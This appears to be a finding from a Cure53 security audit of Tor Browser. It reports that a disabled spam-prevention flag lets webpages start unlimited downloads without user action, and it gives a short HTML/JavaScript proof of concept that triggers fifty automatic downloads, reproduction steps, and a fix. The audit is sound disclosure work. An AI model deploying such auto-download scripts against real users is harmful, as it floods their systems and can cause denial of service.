TTP-02-004 OOS: No user-activation required to download files (Low)

Description

When investigating the new security warnings related to the downloaded files, Cure53 observed that there were no safeguards in place to restrict the number of files that could be downloaded by a single webpage.

This issue is a result of the browser.download.enable_spam_prevention flag being set to false. As a result, malicious pages can download an unlimited number of arbitrary files to the user's Downloads folder without any user-interaction. Additionally, this could also lead to DoS attacks on the user's browser. The approach would entail continuous downloads of files.

PoC:

<html>
  <body>
    <script>
      onload = () => {
        let counter = 0;
        let timer = setInterval(() => {
          if (counter == 50)
            clearInterval (timer);
          download.click();
          counter++;
        }, 1);
      }
    </script>
    <a id="download" href="data:text/html,1337" download="poc.html"></a>
  </body>
</html>

Steps to reproduce:

1. Open the Tor Browser and connect to it.
2. Save the PoC above as an HTML file and open it on the Tor Browser.
3. Observe that fifty downloads will start automatically and be dropped in the default Downloads folder.

To mitigate this issue, Cure53 advises changing the value of the browser.download.enable_spam_prevention flag to true. The change will prevent malicious pages from automatically downloading multiple files. Instead, it will require the user to actively grant permission to the webpage, if they wish to initiate multiple downloads.